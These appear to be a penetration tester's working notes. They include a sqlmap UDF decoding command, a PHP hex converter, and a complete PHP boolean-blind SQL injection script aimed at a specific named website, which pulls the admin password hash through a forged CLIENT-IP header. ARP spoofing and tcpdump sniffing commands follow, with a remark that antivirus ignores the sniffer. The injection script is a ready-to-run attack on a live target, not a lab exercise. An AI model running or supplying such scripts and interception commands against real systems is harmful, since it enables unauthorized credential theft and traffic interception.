cloak.py -d -i D:\sqlmap\udf\mysql\windows\64\lib_mysqludf_sys.dll_
Once decoded it can be used directly.

The same goes for the shells.

A string <-> hex conversion script; it accepts either a literal string or a file path:

<?php
// string <-> hex converter; each option takes a literal string or a path to a file
$options = getopt('d:e:x:');
if (empty($options)) {
    echo <<<EOT
        code by lostwolf :)
Usage:
  $argv[0] -e encode [String or File]  strtohex
  $argv[0] -d decode [String or File]  hextostr
  $argv[0] -x encode [String or File]  strtoxcode
EOT;
    echo PHP_EOL;
}

if (isset($options['d'])) {
    echo hextostr($options['d']) . PHP_EOL;
}
if (isset($options['e'])) {
    echo strtohex($options['e']) . PHP_EOL;
}
if (isset($options['x'])) {
    echo strtoxcode($options['x']) . PHP_EOL;
}

// "AB" -> "4142"
function strtohex($field) {
    if (is_file($field)) {
        $field = file_get_contents($field);
    }
    $s = '';
    foreach (str_split($field) as $c) $s .= sprintf("%02X", ord($c));
    return $s;
}

// "AB" -> "\x41\x42"
function strtoxcode($field) {
    if (is_file($field)) {
        $field = file_get_contents($field);
    }
    $field = bin2hex($field);
    $field = chunk_split($field, 2, "\\x");
    $field = "\\x" . substr($field, 0, -2);
    return $field;
}

// "4142" or "\x41\x42" -> "AB"
function hextostr($field) {
    if (is_file($field)) {
        $field = file_get_contents($field);   // the original read the file into $x and then ignored it
    }
    $field = trim($field);
    if (preg_match('#^[[:xdigit:]]{2,}$#i', $field)) {
        $s = '';
        foreach (str_split($field, 2) as $h) $s .= chr(hexdec($h));
        return $s;
    }
    if (preg_match('#^(?:\\\x[[:xdigit:]]{2})+$#i', $field)) {
        // decode the \xHH escapes directly instead of eval()ing the input as PHP
        return preg_replace_callback('#\\\x([[:xdigit:]]{2})#i',
            function ($m) { return chr(hexdec($m[1])); }, $field);
    }
    exit('Input Error!' . PHP_EOL);
}
?>

Put hex.bat in a directory on the PATH:

@echo off
color a
php C:\gnu\bin\hex.php %*
<?php
// Boolean-based blind extraction of hex(password), bisecting the charset with REGEXP:
// each request halves the candidate set, so one hex digit costs 4 requests instead of 16.

//$sCharset = 'etaoinshrdlcumwfgypbvkjxqz@';
$sCharset = 'ABCDEF0123456789';

/* for every character */
for ($i = 0, $result = ''; $i < 32; ++$i) {
    $ch = $sCharset;

    do {
        $ch1 = substr($ch, 0, intval(strlen($ch) / 2));
        $ch2 = substr($ch, intval(strlen($ch) / 2));

        // earlier payload variants, kept for reference:
        //$p = $sPost.' OR 1=(SELECT 1 FROM blight WHERE password REGEXP \'^'.$result.'['.$ch1.']\' AND sessid=xxx) AND \'1\'=\'1';
        //$payload= "AND ORD(mid(lower(user()),$i,1))= ".ord($p);
        //$p='or 1=(select CURRENT_USER()  REGEXP \'^'.$result.'['.$ch1.']\') and 1=1';
        //201.56.23.45' AND ORD(MID((SELECT HEX(IFNULL(CAST(CHAR_LENGTH(HEX(IFNULL(CAST(password AS CHAR),0x20))) AS CHAR),0x20)) FROM phfirst.`system_user` ORDER BY `user` LIMIT 2,1),4,1))>50#
        //$p='or 1=(select `password`  FROM phfirst.`system_user`  where user=\'admin\' and hex(`password`) REGEXP \'^'.$result.'['.$ch1.']\') and 1=1';
        $p = 'or 1=(select case when (select hex(password) from phfirst.`system_user` where user=\'admin\') '
           . 'REGEXP \'^' . $result . '[' . $ch1 . ']\' '
           . 'THEN 1 ELSE 0 end) and 1=1';

        //echo $p.PHP_EOL;
        $res = mycurl('http://www.phfirst.com.tw/mrtg.php', $p);

        // the response body is the oracle: it decides which half holds the next character
        if (strpos($res, 'mysql_fetch_array') === false)
            $ch = $ch1;
        else
            $ch = $ch2;

    } while (strlen($ch) > 1);

    $result .= $ch;
    echo "\rresult: " . $result;
}


/* get the length first
$payload= " And (select length(user()))=14 ";
$contents= mycurl('http://www.phfirst.com.tw/mrtg.php',$payload);
echo $contents;
*/


function mycurl($url, $str) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0');
    // the injection rides in a forged CLIENT-IP header: the quote closes the IP literal, '#' comments out the rest
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Requested-With: XMLHttpRequest', 'CLIENT-IP: 201.56.23.45\'' . ' ' . $str . '#'));
    //curl_setopt($ch, CURLOPT_PROXY,'127.0.0.1:8081');
    curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8081');      // HTTP proxy, e.g. Burp, to watch the requests
    //curl_setopt($ch, CURLOPT_PROXY, 'socks5://127.0.0.1:1080');  // SOCKS5 proxy
    //curl_setopt($ch, CURLOPT_PROXYTYPE,'CURLPROXY_HTTP');
    curl_setopt($ch, CURLOPT_DNS_CACHE_TIMEOUT, 86400);   // cache DNS for a day
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        // return the body as a string
    //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);      // follow 302 redirects
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
    $ret = curl_exec($ch);
    curl_close($ch);
    return $ret;
}

ARP spoofing

arpspoof.exe /l                          list the network interfaces
arpspoof.exe 192.168.3.1 192.168.3.5 80 0 1

Sniffing:

tcpdump -D                 list the network interfaces
tcpdump -i 3 -w h.cap -s 0

-s 0 removes the capture length limit (snaplen);
without it packets are truncated and the capture is incomplete!
The nice thing about tcpdump on Windows is that it needs no WinPcap install and runs purely from the command line,
so AV leaves it alone.

The capture can then be analysed with Wireshark.

Related tool download: sniffing